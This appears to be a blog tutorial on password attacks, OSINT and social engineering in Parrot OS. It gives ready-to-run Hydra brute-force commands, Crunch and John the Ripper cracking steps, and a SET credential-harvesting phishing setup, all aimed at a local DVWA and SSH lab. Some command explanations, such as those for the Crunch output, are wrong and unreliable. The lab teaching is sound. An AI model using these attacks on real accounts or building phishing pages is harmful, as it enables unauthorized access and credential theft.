Password cracking attack demonstration

Day 6: Password Attacks, OSINT & Social Engineering Tools

Cracking & OSINT: Hydra, Crunch, Sherlock & Maltego

Password attacks, Open-Source Intelligence (OSINT), and social engineering are critical techniques in penetration testing, enabling security professionals to identify weak credentials, gather intelligence, and simulate human-based attacks. Parrot OS, a Debian-based Linux distribution designed for cybersecurity, provides a robust suite of tools for these purposes. On Day 6 of this 7-day learning series, we explore password cracking, intelligence gathering, and social engineering. This article covers brute-forcing logins with Hydra, creating custom wordlists with Crunch, performing OSINT with Sherlock, theHarvester, and Maltego, and setting up social engineering attacks with the Social-Engineer Toolkit (SET). Additional tools like John the Ripper and Recon-ng are included to enhance your capabilities. By mastering these tools and techniques, you will be equipped to conduct ethical password attacks, gather actionable intelligence, and simulate social engineering in a controlled environment.

Understanding Password Attacks, OSINT, and Social Engineering

Password attacks exploit weak or predictable credentials, OSINT leverages publicly available data for reconnaissance, and social engineering manipulates human behavior to gain unauthorized access. Below, we outline these concepts to provide context for the tools covered.

Password Attacks

Password attacks attempt to recover or bypass authentication credentials. Common methods include:

  • Brute-Force Attacks: Trying all possible combinations of characters.
  • Dictionary Attacks: Using a predefined list of common passwords or phrases.
  • Hybrid Attacks: Combining dictionary words with variations (e.g., adding numbers).

These attacks target login forms, SSH, or other services, often exploiting weak passwords like password123.

Open-Source Intelligence (OSINT)

OSINT involves collecting and analyzing publicly available data from sources like social media, websites, and public records. It helps map a target’s digital footprint, identifying usernames, emails, or infrastructure.

  • Example: Finding employee emails on LinkedIn for targeted phishing.
  • Impact: Reveals potential attack vectors without direct interaction.

Social Engineering

Social engineering exploits human psychology to gain access or information, often through phishing, pretexting, or impersonation.

  • Example: Sending a fake login page to capture credentials.
  • Impact: Bypasses technical controls by targeting users.

Task: Research one social engineering technique (e.g., phishing or pretexting) and describe how it could be used in a controlled test environment.

Outcome: You understand the principles of password attacks, OSINT, and social engineering, preparing you for practical application.

Setting Up a Testing Environment

Testing password attacks and social engineering requires a controlled environment. We use Damn Vulnerable Web Application (DVWA) and a local SSH server for password attacks, and a virtualized network for social engineering.

Verifying DVWA

Ensure DVWA (set up on Day 4) is operational:

  1. Check LAMP Stack: 
    sudo systemctl status apache2
sudo systemctl status mysql
  2. Access DVWA: Navigate to http://localhost/dvwa, log in with admin/password, and set the security level to “Low”.

Setting Up an SSH Server

An SSH server allows testing brute-force attacks locally.

  1. Install OpenSSH: 
    sudo apt install openssh-server
  2. Start SSH Service: 
    sudo systemctl start ssh
sudo systemctl enable ssh
  3. Create a Test User: 
    sudo adduser testuser
    Set a weak password (e.g., password123) for testing.

Task: Verify DVWA and set up an SSH server with a test user for brute-force testing.

Outcome: You have a controlled environment for testing password attacks and social engineering.

Brute-Forcing Logins with Hydra

Hydra is a password-cracking tool that performs brute-force and dictionary attacks against various services, including HTTP forms and SSH.

Using Hydra

  1. Brute-Force SSH: 
    hydra -l testuser -P /usr/share/wordlists/rockyou.txt ssh://localhost
    Attempts to crack the testuser account using the rockyou.txt wordlist.
  2. Brute-Force HTTP Form: 
    hydra -l admin -P /usr/share/wordlists/rockyou.txt localhost http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"
    Targets DVWA’s login form, specifying the failure message.
  3. Limit Attempts: 
    hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 4 localhost http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"
    Limits to 4 concurrent tasks to reduce server load.

Ethical Note: Only perform brute-force attacks on systems you own or have explicit permission to test. Unauthorized attempts are illegal.

Task: Use Hydra to brute-force the testuser SSH account and DVWA’s login form with a small wordlist.

Outcome: You can perform brute-force attacks to test credential strength.

Wordlist Creation with Crunch

Crunch generates custom wordlists for password attacks, allowing tailored combinations of characters, numbers, and symbols.

Using Crunch

  1. Basic Wordlist: 
    crunch 4 4 0123 -o numbers.txt
    Generates 4-digit numbers (0000–9999).
  2. Custom Patterns: 
    crunch 6 6 -t pass@@ -o custom.txt
    Creates 6-character passwords starting with “pass” followed by two symbols (e.g., pass@@, pass##).
  3. Character Sets: 
    crunch 5 5 -f /usr/share/crunch/charset.lst lalpha -o lowercase.txt
    Uses lowercase letters for 5-character passwords.

Task: Generate a wordlist with Crunch (e.g., 4-character alphanumeric) and use it with Hydra to brute-force DVWA’s login.

Outcome: You can create custom wordlists to enhance password attack efficiency.

OSINT with Sherlock

Sherlock searches social media platforms for usernames, aiding in OSINT by identifying a target’s online presence.

Using Sherlock

  1. Install Sherlock (if not pre-installed): 
    git clone https://github.com/sherlock-project/sherlock.git
cd sherlock
pip3 install -r requirements.txt
  2. Basic Search: 
    python3 sherlock.py username
    Searches for username across platforms.
  3. Output to File: 
    python3 sherlock.py username --output results.txt

Task: Use Sherlock to search for a common username (e.g., john) and review the platforms where it appears.

Outcome: You can gather OSINT on usernames across social media.

OSINT with theHarvester

theHarvester collects emails, subdomains, and hosts associated with a domain, enhancing OSINT capabilities.

Using theHarvester

  • Basic Search: 
    theharvester -d example.com -b google
    Queries Google for data related to example.com.
  • Multiple Sources: 
    theharvester -d example.com -b all
  • Save Output: 
    theharvester -d example.com -b google -f results.html

Task: Run theHarvester on a public domain (e.g., tesla.com) and analyze the collected emails and subdomains.

Outcome: You can collect comprehensive OSINT data for a target domain.

OSINT with Maltego

Maltego is a graphical OSINT tool that visualizes relationships between entities (e.g., people, domains, emails).

Using Maltego

  1. Launch Maltego: 
    maltego
    Open Maltego from the Parrot menu.
  2. Create a New Graph:
    • Select “New Graph” and add an entity (e.g., Domain: example.com).
    • Run transforms (e.g., “To Emails,” “To Subdomains”).
  3. Analyze Results: Review the visual graph for relationships and save the output.

Task: Use Maltego to map relationships for a public domain and export the graph.

Outcome: You can visualize OSINT data with Maltego’s graphical interface.

Social Engineering with SET

The Social-Engineer Toolkit (SET) automates social engineering attacks, such as phishing and credential harvesting.

Using SET

  1. Launch SET: 
    sudo setoolkit
  2. Configure a Phishing Attack:
    • Select “Social-Engineering Attacks” > “Website Attack Vectors” > “Credential Harvester Attack.”
    • Choose “Site Cloner” and enter a target URL (e.g., http://localhost/dvwa/login.php).
    • Set the listening IP (e.g., 192.168.1.101).
  3. Test the Attack: Access the cloned page from another system and submit credentials to verify capture.

Task: Use SET to create a credential harvesting page for DVWA’s login and test it locally.

Outcome: You can simulate social engineering attacks to test user vulnerabilities.

Additional Tools: John the Ripper and Recon-ng

To enhance your capabilities, Parrot OS includes John the Ripper for password cracking and Recon-ng for advanced OSINT.

John the Ripper

  • Crack Password Hashes: 
    john hash.txt
    Cracks hashes in hash.txt using default settings.
  • Custom Wordlist: 
    john --wordlist=custom.txt hash.txt

Task: Use Crunch to generate a wordlist, then use John the Ripper to crack a sample hash (e.g., from DVWA’s password file).

Recon-ng

  • Launch Recon-ng: 
    recon-ng
  • Run Modules: 
    marketplace install recon/domains-hosts/bing_domain_web
modules load recon/domains-hosts/bing_domain_web
set SOURCE example.com
run
    Discovers subdomains for example.com.

Task: Use Recon-ng to discover subdomains for a public domain and compare results with theHarvester.

Outcome: You can crack passwords and perform advanced OSINT with John the Ripper and Recon-ng.

Practical Exercise

  1. Verify DVWA and set up an SSH server with a test user.
  2. Use Hydra to brute-force the SSH account and DVWA login.
  3. Generate a wordlist with Crunch and test it with Hydra.
  4. Run Sherlock to search for a username across platforms.
  5. Use theHarvester and Maltego to gather OSINT on a public domain.
  6. Create a phishing page with SET and test credential capture.
  7. Test John the Ripper and Recon-ng on sample data.

Conclusion

Day 6 of this 7-day series has equipped you with the skills to perform password attacks, OSINT, and social engineering using Parrot OS’s powerful tools. By mastering Hydra for brute-forcing, Crunch for wordlist creation, Sherlock, theHarvester, and Maltego for OSINT, and SET for social engineering, along with John the Ripper and Recon-ng, you can effectively test security controls in a controlled environment. These skills are essential for ethical hacking and vulnerability assessment. Continue practicing in a safe, legal setting, and prepare for Day 7, where you will explore post-exploitation and reporting.

Next Steps:

  • Experiment with advanced Hydra options and larger wordlists.
  • Explore additional Recon-ng modules for deeper OSINT.
  • Engage with cybersecurity communities on platforms like X to share insights and learn best practices.
Avatar photo

I'm passionate about technology, coding. I've been interested in computers since I was a kid. My favorite programming languages are python and JavaScript

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *